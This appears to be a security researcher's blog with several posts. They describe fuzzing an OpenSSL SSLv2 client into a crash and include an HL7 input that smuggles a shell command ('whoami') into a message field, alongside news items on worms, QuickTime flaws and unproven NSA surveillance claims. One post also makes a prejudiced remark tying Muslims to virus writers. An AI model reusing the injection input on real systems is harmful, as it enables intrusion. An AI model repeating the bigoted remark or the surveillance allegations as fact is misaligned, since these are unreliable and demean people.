From description to exploit

Every once in awhile I get an opportunity to work on a “known” vulnerability, but with very little or even no available technical details. These known vulnerabilities tend to be “known” just to their finder and to the vendor that fixed the vulnerability. We know they exist because an advisory is published, but not much more than that.
From the point where the vulnerability got fixed, no one (researcher or vendor) has any interest in disclosing the vulnerability details – as it is no longer interesting – leaving security researchers with insufficient information to confirm whether this vulnerability affects anyone else beside the specific vendor – and specific vendor version.

This is the point I reached today, where our team wanted to update a test of our vulnerability scanner to check for the exploitability of a certain vulnerability on a new platform. The version indicated it was vulnerable to the problem but there was no way to confirm it as the vulnerability’s technical description was inadequate, and checking only the version is a sure way for multitude of false positives.
With the little information available:
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.

I was determined to discover what was the “unknown vector” and see whether the product I tested was in fact vulnerable or not.

First step was to understand what the SSLv2 exactly is, and how I can get it – well simple enough here, “openssl s_client” is just what I needed – it was a sample SSL client that utilizes the get_server_hello() function.

Then I needed to create an SSLv2 session, this proved to be a bit more difficult as SSLv2 is now considered insecure and most SSL installations disable it – further Firefox no longer allows connecting to those sites that support it… but apparently Apache 2 haven’t given up on it, and you can turn SSLv2 support quite easily through the SSLProtocol definition.

Once that was available, I launched beSTORM’s auto-learn mechanism and made it capture the SSLv2 traffic – a complete session can be quite extensive but I only needed the first packets as they were the one get_server_hello() function looks into – once this was ready I used the pcap export capabilities to load the captured data into Wireshark – and use Wireshark’s existing dissection to mark which fields where what – who was the length of what, what was a flag, etc.

Then I told beSTORM to start listening on incoming traffic and play around with the values, I mainly concentrated on the following ServerHello parameters:

  • Packet Length (total length)
  • Session ID Hit (valid value is either set to 0×01 or set to 0×00)
  • Certificate Type (it is an enumeration of three possible values)
  • Certificate Length
  • Certificate Value
  • Cipher Spec Length
  • Cipher Spec Value
  • Connection ID Length
  • Connection ID Value

After a few thousands of combinations – taking about 50 minutes – with beSTORM modifying the Session ID Hit (set to 0×00), Certificate Type set to NULL (0×00), Certificate Length equal to 0, Certificate Value set to none, Cipher Spec Length equal to 0, Cipher Spec Value set to none and the default captured values of Connection ID – the openssl client crashed:

Program received signal SIGSEGV, Segmentation fault.
0x0808638d in get_server_hello (s=0x81aed90) at s2_clnt.c:542
542 if (s->session->peer != s->session->sess_cert->peer_key->x509)

Now all I needed was to instruct beSTORM to build a module from it – job done.

From a very vague description to an exploit in about an hour :-)

An exploit can be found at:  OpenSSL SSLv2 Client Crash (NULL Reference)

Share

‘Tis the season

The last week of December is sometimes an interesting week in our industry.

IT security is often pictured as a fight between the ‘good guys’ and the ‘bad guys’. Well, from December 25th to January 1st, the battlefield is noticeably skewed in favor of the bad guys.

It’s not too difficult to see why – the CSO’s are on vacation. The IT staff is minimal. Nobody would risk deploying a patch that would affect the entire company come January 1st (and who wants his boss to come back to work after a New Year’s party and find out her computer doesn’t boot). On the vendor side, things are similar; you better not find a critical exploitable buffer overflow in this critical week – they’ll be no one to fix it. Or deploy a workaround.

Last year, Determina reported the .ANI buffer overflow to Microsoft in December, but the acknowledgment from MS only came in early January (not to mention the patch itself came in March).
Two years ago the WMF exploit made noise and since the Microsoft engineers were on vacation Ilfak and ZERT had to pitch in and release 3rd party patches for this problem.

In Christmas 2004, Ironically enough, Microsoft was busy with the first .ANI vulnerability (this one reported by eeye) almost identical to the one that followed 2 years after and again a patch that waited until after the MS QA team had time to recover from the New Year’s hangover.

Six years ago, David Litchfield turned Oracle’s then marketing tagline “Unbreakable” into pure mockery by discovering a serious of remotely exploitable vulnerabilities which of course were not patched in time for Santa Claus season.

These stories remind me of the Christmas party at the Nakatomi building in “Die Hard”, only in our case the attackers have the additional benefit of the “out of office” messages telling them who left their post (not to mention not all companies have John McLain to save them from imminent doom).

Will this holiday season be quiet? So far there aren’t any clouds on the horizon, so lets hope it stays that way for another 10 days or so. After all, even us security folks need our R&R…

Happy holidays everyone!

Share

Cryptome: NSA has real-time access to Hushmail servers

A frequent source ‘A’ sending updated NSA-Affiliated IP resources to Cryptome’s Web site has reported the following new information:

Certain privacy/full session SSL email hosting services have been purchased/changed operational control by NSA and affiliates within the past few months, through private intermediary entities.

Reportedly the following services are controlled:

Hushmail – based in Canada,
Guardster – based in USA,
and
SAFe-mail.net – based in Israel.

Link here: NSA Controls SSL Email Hosting Services

Update 22nd Dec: Guardster Team has posted its response on 21st Dec to Cryptome:

We can assure you that we do not cooperate with the NSA or any other government agency anywhere in the world. We invite whomever is making this statement to provide proof, rather than making a baseless accusation.
….

Response from Safe-mail.net Team (24th Dec) is the following:

1. We never had any contacts, direct or indirect, with the NSA or any other
government agency anywhere in the world.
2. All software we use is in-house development.
3. We have never shared our technology with any other party.
….

Update 30th Dec: Hushmail Team has posted its response yesterday to Cryptome’s Web site:

Hush Communications Corporation, the company that provides the Hushmail.com email service, is not owned, wholly or in part, by any government agency.

Additionally, ‘More info on industry Windows security software’ has been released:

Zone Alarm, Symantec, MacAfee: All facilitate Microsoft’s NSA-controlled remote admin access via IP/TCP ports 1024 through 1030; ie will allow access without security flag. Unknown whether or not software port forward routing by these same programs will defeat NSA access.

The post released in Cryptome.org on 1st Nov informed about the future updates with details related to this issue and this is the first piece of information.

To the new readers: Cryptome: NSA has access to Windows Mobile smartphones

Share

New Security Threats & Solutions

Recently the security industry has found new hybrid viruses which top anything previously known. They are saying that virus producers now are almost like a terrorist group, they have funding, they have research and development teams, etc. It should be expected really, as there are obviously hate groups all over, particularly Muslim I guess, and they are willing to blow them selves up just to attack the West. 

What do these hybrid viruses do? 

One such virus found in 2007 was named “Storm”, and has been called a Worm and Trojan as well as Virus because it has features of both, I just call them all viruses. Storm actually has capabilities of an SMTP relay apparently, and some sort of Socket server with the capability to communicate stolen information to many destinations, even the ability to communicate and warn it’s own Storm infected host computers across a network of many Storm infected computers. One report said this Storm creates a Botnet of computers with combined criminal computing power greater then IBM’s best super-computers. This virus has features which I really do not want to state because I don’t want to proliferate virus design. This virus starts in an eMail containing an executable attachment, the dumb users are tricked into running the attachment. That’s typical. Experts are estimating that this Storm virus has infected more then 200 million computers around the world, by email, and only the US and Europe have gotten some control of it at this time. 

What’s the solution? 

Actually the solution is to not execute any program from any source except your trustworthy business associates, within the US preferably. But where ever you are you need to have educated and trustworthy associates, so they don’t accidentally propagate viruses. However with eMails you also need to be sure they are legitimate, not artificially produced by a spam virus using your friend’s eMail address. That’s the rule for me, but many of my clients just can’t keep these rules, so I install good Anti-virus software on their computers.

There are a lot of anti-virus packages out there, but big names are not always best. For example Trend-Micro is recommended by many but tests have shown it is not that thorough, and Microsoft has been unwilling to participate and prove the quality of their AV software. McAfee is what I use for many of my clients and it has an excellent track record for many years with a low price, though I also use Symantec which is possibly the best of all. 

I know better then to run any eMail attachment, or download and run any questionable software product from non-american companies particularly, so I have actually not had a virus that I can remember. And I have not used Anti-virus software for near 10 years on my computers. Well, pre 2000 I think I had some minor virus problems, and I unfortunately downloaded and used some over-seas software and started having computer problems, so I backed everything up and wiped my hard drive clean. That’s how I solve my virus problems. Were you expecting some elaborate solution? True, you need more advanced solutions particularly for big networks… 

Advanced corporate solutions: 

Most importantly, again, the solution is to not execute a questionable program. This is especially important on servers, and ultra important for administrators to be careful not to run any questionable program. Second you need good Firewall solutions implemented on your network, this holds down such things as the Storm virus. These things are standard practice of course. I have actually averted these problems all together for administration by using a product called Iron-Admin from WiseFirm, I use it to administer all of my customer’s servers and workstations. This product allows you to administer all your network computers from one workstation, including Windows and Unix/Solaris/Linux servers, and you don’t ever have to execute any programs at all. Iron-Admin uses high-encryption for all it’s communications, and from one computer you can remotely administer 100s of servers and limitless workstations, and do backups of them all at scheduled times. Another similar product which I have tried is InterStructures, but it is not compatible with AIX and Solaris and does not do backups.

You may use Anti-virus software, but honestly it is over-rated. Consider the case of a new virus, such as Storm, in this case your Anti-virus software will not recognize it initially. If your company is so unfortunate that this virus gets access to administration level servers, your whole company’s data could fall. Anti-virus software is a good step to protect common user’s computers to a limited degree, and to stop a virus eventually after it has been discovered. 

I will get into more details on the security factors we have looked at in this article, and some additional ones. Look for my future blogs here. 

 

Share

Orkut virus/worm on the loose

An Orkut based virus/worm appears to be on the loose, it propagates by posting notes on people’s scrapbook. So chances are that if you got a new scrapbook item on your long-unused Orkut it is because the worm has infected one of your friends there.

The virus/worm utilizes javascript code to propagate. The source of it can be found here: hxxp://files.myopera.com/virusdoorkut/files/virus.js
Update: Google apparently is actively deleting items from the scrapbook of people that were infected and that have infected others.

Update 2: More details can be found here: http://antrix.net/journal/techtalk/orkut_xss.html

Share

beThere backdoor still there

I’ve said it before – some vendors just don’t get it. Security culture isn’t something you can fake.

Well, according to theregister, beThere customers are still vulnerable to the security flaw Sid reported here back in February. When you think about the fact this has been reported to beThere long before Sid published the details, you can see how embarrassing the situation is.
Some companies think security advisories should be handled by the PR department. Well, it shouldn’t. And if you’re a beThere customer, fix your system pronto, and take note of your ISP’s attitude when it comes to your security.

Share

Pushdo analysis

Joe has a nice write up on the inner working of the Pushdo Trojan.

Pushdo is interesting since it was written for “future use” – i.e. it updates itself to obey his master’s latest needs and requests. It also has intelligence-collecting routines and in general shows how sophisticated the bad guys are getting.

Share

Fuzzing is not just buffer overflows

We recently introduced a few improvements to our beSTORM fuzzing framework to make it test for things other than the common buffer overflow, format strings, integer overflow, off-by-one, etc. These includes less common vulnerabilities like command execution and code injection. These type of vulnerabilities are more complicated to test as they require close integration with the product being tested – namely monitor what it tries to open (similar to what filemon does) and what it tries to execute (in the case of Perl, PHP, etc).

Armed with these new tests we took one of the candidate we knew had no vulnerabilities of “common” ones as it is written in Perl, as such it was never audited for vulnerabilities, launched our fuzzing module for HL7 (Health Level 7) and awaited for the results, after several hundred of tests it detected something very particular:

Sending:

\x0bMSH|^~\\&|||||20071203173658|||20071203173658.98 \x0d`/usr/bin/whoami`|||XXX|\x0d\x1c\x0d

Instead of the “normal” – non fuzzed traffic:

\x0bMSH|^~\\&|||||20071203173658|||20071203173658.98 \x0dMSH|||XXX|\x0d\x1c\x0d

Caused the program located under /usr/bin/whoami to get launched, of course this isn’t a ready made exploit or it is a vulnerability none the less, you can probably guess what the next step is :)

Update: The author of the program has promptly fixed the vulnerability and has released a new version, accessible by using the toolkit’s CVS version.
P.S: even though the software hasn’t been updated since March 2005, several vendors provide it as part of their HL7 implementations.

A CVE has been given to this vulnerability: CVE-2007-6264

Share

The number of unpatched QuickTime flaws is: two

The number of recent QuickTime PoC’s is remarkable large and the active exploitation has begun as well, as many of the readers know.

However, the QuickTime RTSP vulnerability reported on 23th Nov is not the only one.

It appears that WabiSabiLabi team has reported that there is another (they call it zero-day vuln) flaw in Apple’s QuickTime player too.

This is what their blog post states:

We just want to specify that the vulnerability shown on those POCs IS NOT the one present in our marketplace.

They are pointing to PoCs listed at Milw0rm etc.

And a summary:

The first issue reported by Krystian Kloskowski (aka h07) is CVE-2007-6166 – CVSS score 9.3. For workarounds see US-CERT VU#659761.

The second issue reported by unknown person is CVE-2007-6238 – CVSS score 10.0. Reportedly ‘Affected system: Windows XP’.

Share

Fuzzing the FIX Protocol

We have been asked by one of our customers to provide a beSTORM fuzzing module for the FIX protocol, for those who don’t know what FIX is – in laymen terms it what allows the world of finance to work as it is part of the Financial Information eXchange, the protocol is fairly simple and very insecure – not just because it is textual.

I will update you guys as soon as I can provide more details.

Share

And the winner is …

Researchers from the Netherlands have predicted that the next president will be Paris HiltonOprah WinfreyAl Gore… well actually they don’t know, but what they do know is that they can created PDFs, or any other file format that allows storing random bits inside of it without affecting it, that all share the same MD5 value 3D515DEAD7AA16560ABA3E9DF05CBC80.

More details on the research can be found at their Predicting the winner of the 2008 US Presidential Elections using a Sony PlayStation 3 paper.

Share

Tools, tools, tools.

Maltego GUI is off-the-freaking-chain. Check it out at http://www.paterva.com/web2/maltego/maltego-gui-1.0-download.html

Also, the folks at Security Compass have released some new firefox plugins which should aid in detecting SQL injection and XSS. I’m between gigs, but will give these a good test drive the next time I’m tasked with a web application.

If one doesn’t already exist, I’d like an open source “Reporting Framework”. A metasploit for power reporters. I spend at least 10% of my consulting hours on reporting. I hate reporting. Feed this tool your reports and get back a standard report in the template of your choosing. All cross-referencing with CVE, CVSS, BID, NIST, etc. should be automagic. Relevant references should be automatically inserted (links to patches, standards, etc.). There should even be an option for uploading screen shots which are tagged to an IP/FQDN and service…

Enjoy the Holiday of your choosing,

!Dmitry

Share